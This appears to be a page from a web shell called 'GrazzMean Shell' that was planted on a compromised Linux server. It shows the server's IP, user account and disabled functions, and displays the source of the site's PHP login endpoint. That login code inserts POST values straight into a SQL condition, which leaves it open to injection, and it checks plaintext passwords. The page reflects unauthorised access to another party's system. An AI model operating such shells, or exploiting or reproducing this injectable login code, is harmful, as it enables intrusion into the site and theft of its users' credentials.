shell bypass 403

GrazzMean Shell

Uname: Linux server.thebazaar99.com 5.14.0-687.17.1.el9_8.x86_64 #1 SMP PREEMPT_DYNAMIC Mon Jun 22 07:21:26 EDT 2026 x86_64
Software: Apache
PHP version: 8.3.32 [ PHP INFO ] PHP os: Linux
Server Ip: 163.227.92.254
Your Ip: 216.73.217.24
User: gutlooks (1003) | Group: gutlooks (1005)
Safe Mode: OFF
Disable Function:
exec,passthru,shell_exec,system

name : up_login_detail.php
<?php
//function autoload
    // function __autoload($class)
    //     {
    //         include("../admin_login/classess/".$class.".php");
    //     }
        spl_autoload_register(function($class) {
  include("../admin_login/classess/".$class.".php");
});
        
        $sqlfun = new sqlfunction();
        $admin = new admin_login();
            
            
            if(isset($_POST['token'])  && isset($_POST['pin']) && isset($_POST['mble']) && isset($_POST['pswd']))
                {
                    $row = new stdClass();
                    
                
                    $checks = $sqlfun->query("select * from message join news join upi");
                    $message = $checks->fetch(PDO::FETCH_OBJ);
                    $row->message =  $message;
                    
                    $checks_video = $sqlfun->query("select * from video_tutorial");
                    $videos = $checks_video->fetchAll(PDO::FETCH_ASSOC);
                    $row->video_tutorial =  $videos;
                    
                    
                    
                    
                    $check2 = $sqlfun->fetchdata("banner","status = 'Y'");
                    $banner = $check2->fetchAll(PDO::FETCH_ASSOC);
                    $row->banner = $banner;
                                
                                
                    $deviceToken = $_POST['token'];
                    $secretKey = $_POST['pin'];
                    $mble = $_POST['mble'];
                    $pswd = $_POST['pswd'];
                    $login_device = $_POST['login_device'];
                    $up_datetime = $_POST['up_datetime'];
                    $p_id = $admin->verifyCredentials3($deviceToken, $secretKey,$mble);
                    if($p_id)
                    {
                        
                         $datas = array(
                            "up_datetime" =>$up_datetime,
                            "login_device" =>$login_device,
                            );
                        $cnd = "p_mobile = '$mble' && pwdd = '$pswd'";
                        $check = $sqlfun->fetchdata("player",$cnd);
                        
                        if($check->rowCount() > 0)
                        {
                            if($sqlfun->updated("player",$datas,$cnd))
                            {
                                $row1 = $check->fetch(PDO::FETCH_OBJ);
                                $row->user = $row1;
                            }
                        }
                       
                        echo json_encode(array("res"=>"success","msg"=>"login successful","data"=>$row));
                    }
                    else
                    {
                        echo json_encode(array("res"=>"success","msg"=>"data without user","data"=>$row));
                    }
                }
                else
                {
                    echo json_encode(array("res"=>"failure","msg"=>"param not found","data"=>new stdClass()));
                }
© 2026 GrazzMean